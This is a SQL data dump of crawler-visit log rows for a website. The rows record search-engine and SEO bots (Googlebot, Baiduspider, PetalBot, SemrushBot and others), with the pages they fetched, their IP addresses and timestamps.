INSERT INTO `ey_weapp_spider_visit` VALUES ('96543', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lf.html', '114.119.151.153', '1661357105', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96533', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/199.html', '216.244.66.194', '1661350189', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96532', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_25.html', '220.181.108.105', '1661350120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96536', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/450.html', '185.191.171.35', '1661352176', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96709', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/216.html', '114.119.151.153', '1661437249', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96618', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cz.html', '114.119.151.155', '1661388994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96530', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/451.html', '180.163.220.61', '1661348058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96529', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.112', '1661347922', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96710', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ncs.html', '114.119.151.153', '1661437509', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96711', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/123.html', '114.119.151.153', '1661437774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96703', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/chengzhou.html', '114.119.151.155', '1661434256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96704', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ly.html', '114.119.151.155', '1661434573', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96705', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/62.html', '185.191.171.25', '1661434641', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96519', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.110', '1661343990', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96539', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/386.html', '66.249.79.108', '1661354274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96526', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661347540', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96756', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/list_4_3/', '162.55.86.60', '1661444430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96521', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/125.html', '185.191.171.33', '1661345642', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96522', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jns.html', '114.119.151.155', '1661345724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96518', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/57.html', '216.244.66.194', '1661343474', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96514', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/65.html', '185.191.171.43', '1661342673', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96760', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/130.html', '162.55.86.60', '1661444459', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96761', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/166.html', '162.55.86.60', '1661444468', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96762', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/250.html', '162.55.86.60', '1661444476', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96513', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661342275', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96512', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661340174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96517', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/327.html', '185.191.171.44', '1661343411', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96758', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/24.html', '162.55.86.60', '1661444441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96759', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/25.html', '162.55.86.60', '1661444449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96510', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661339017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96509', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661339016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96765', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/261.html', '162.55.86.60', '1661444495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96764', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/258.html', '162.55.86.60', '1661444488', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96520', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/462.html', '17.121.115.32', '1661344135', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96757', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gqal/list_87_2/', '162.55.86.60', '1661444438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96706', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gqal/list_87_2/', '185.191.171.16', '1661434777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96708', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/99.html', '220.181.108.111', '1661436688', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96506', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_23/', '114.119.151.155', '1661337422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96769', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/313.html', '162.55.86.60', '1661444536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96503', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/104.html', '216.244.66.194', '1661337088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96700', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jilinsheng.html', '114.119.151.155', '1661433324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96642', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/82.html', '54.161.41.102', '1661405856', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96921', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661505806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96548', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/407.html', '114.119.151.155', '1661359591', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96498', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/list_2_2/', '17.121.115.45', '1661336182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96499', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tss.html', '114.119.151.153', '1661336351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97235', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/232.html', '116.179.32.139', '1661642997', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97483', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/494.html', '66.249.79.112', '1661753229', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96500', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/331.html', '17.121.112.115', '1661336467', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97234', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/317.html', '66.249.79.108', '1661642948', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97484', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/70.html?tagid=70', '185.191.171.5', '1661753982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96719', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52.html', '185.191.171.3', '1661440127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97351', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661685165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96490', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/487.html', '17.121.115.105', '1661331854', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96491', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/132.html', '114.119.151.153', '1661332449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98929', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.110', '1662442015', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96488', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xianyang.html', '114.119.151.155', '1661331027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96484', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_40/', '116.179.32.155', '1661330484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96481', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.174', '1661329625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96480', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/52.html', '66.249.79.108', '1661329620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96482', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/314.html', '185.191.171.5', '1661329815', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96483', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/147.html', '114.119.151.153', '1661330203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96477', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.129.224.13', '1661328396', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96479', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/229.html', '114.119.151.155', '1661329203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96475', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/197.html', '66.249.79.110', '1661327183', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96468', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/19.html', '185.191.171.7', '1661323185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96494', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/honor', '116.179.32.89', '1661332838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96489', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/blj/list_12_2/', '185.191.171.26', '1661331097', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96467', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/226.html', '185.191.171.15', '1661322577', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96466', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/95.html', '116.179.32.75', '1661322355', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96462', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/369.html', '185.191.171.16', '1661320437', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96460', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1661319932', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96504', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zhongshan.html', '114.119.151.155', '1661337222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96464', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/55.html', '216.244.66.194', '1661321369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96501', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661336825', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96465', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/80.html', '66.249.79.108', '1661321761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96497', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/74.html', '114.119.151.155', '1661336179', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96469', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_42.html', '185.191.171.35', '1661323288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96470', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/179.html', '185.191.171.5', '1661323328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96471', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/484.html', '185.191.171.44', '1661323962', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96472', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/172.html', '116.179.32.153', '1661323991', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96461', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.110', '1661319933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96458', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661319422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96454', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_10/', '185.191.171.24', '1661316623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96452', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/487.html', '185.191.171.13', '1661315521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96446', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/419.html', '66.249.79.108', '1661314622', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96447', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661314663', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98932', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73.html', '185.191.171.41', '1662443181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96502', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_4.html', '185.191.171.9', '1661336961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96444', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/430.html', '185.191.171.12', '1661313734', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96463', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_14.html', '116.179.32.154', '1661320719', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96438', '99', 'mozilla/5.0 (compatible; seznambot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', '/', '77.75.76.164', '1661311215', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96432', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/54.html', '216.244.66.194', '1661308700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96434', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '116.179.32.105', '1661308788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96430', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/496.html', '216.244.66.194', '1661307959', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96450', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/81.html', '220.181.108.82', '1661315128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96429', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.112', '1661307674', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96425', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661306733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96426', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hk.html', '114.119.151.153', '1661307110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96451', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_33.html', '185.191.171.13', '1661315406', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96424', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/368.html?admin_id=1', '114.119.151.155', '1661306426', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96445', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/166.html', '185.191.171.38', '1661313786', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96428', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.108', '1661307673', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96419', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/428.html', '114.119.151.153', '1661305400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96771', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/373.html', '162.55.86.60', '1661444553', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96418', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/243.html', '114.119.151.153', '1661304984', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96412', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/liaoyuan.html', '114.119.151.155', '1661304237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96413', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/237.html', '185.191.171.33', '1661304238', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96411', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/192.html', '207.46.13.215', '1661304231', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96414', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_3.html', '185.191.171.22', '1661304384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96410', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/108.html', '185.191.171.1', '1661304143', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96415', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/122.html', '114.119.151.153', '1661304526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96403', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/58.html', '220.181.108.158', '1661302889', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96385', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_2', '114.119.151.155', '1661284786', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96384', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661284481', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96778', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/488.html', '162.55.86.60', '1661444626', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96779', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/490.html', '162.55.86.60', '1661444634', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96382', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/36.html', '116.179.32.75', '1661283791', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96377', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/kf.html', '114.119.151.155', '1661283297', '0');
